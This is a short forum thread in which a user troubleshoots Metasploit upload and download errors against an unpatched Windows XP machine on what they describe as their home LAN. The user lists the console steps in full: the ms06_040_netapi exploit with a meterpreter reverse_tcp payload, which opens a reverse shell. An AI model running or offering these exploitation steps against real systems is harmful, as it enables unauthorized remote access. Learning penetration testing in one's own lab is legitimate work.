Hi, I'm trying to upload and download using metasploit over my home LAN for an unpatched XP machine.

However, 9/10 I have these errors thrown back at me:

[-] stdapi_fs_stat: Operation failed: 2

[-] Error running command upload: No such file or directory - c:\test.txt

*the file does exist, cause I only just made it, doesn't like uploading old files either.

Any suggestions would be appreciated.

could you specify what kind of exploit you are trying to use, payload etc.

also, could you detail the steps you are using, do you use the msfcli or the console ?

Thank!

I suppse that info would be useful, sorry meant to post:

exploit: windows/smb/ms06_040_netapi
payload: windows/meterpreter/reverse_tcp

going through the console, the steps I follow are:

1. use windows/smb/ms06_040_netapi
2. set rhost 192.168.*.*
3. set payload windows/meterpreter/reverse_tcp
4. set lhost 192.168.*.*
5. set target 0
6. exploit

I then get a reverse shell (I ipconfig just to check) then try moving files up and down to no avail, I can make directories though.

I've tried putting the rhost port to above 5000 on another suggestion from someone, but nothing...
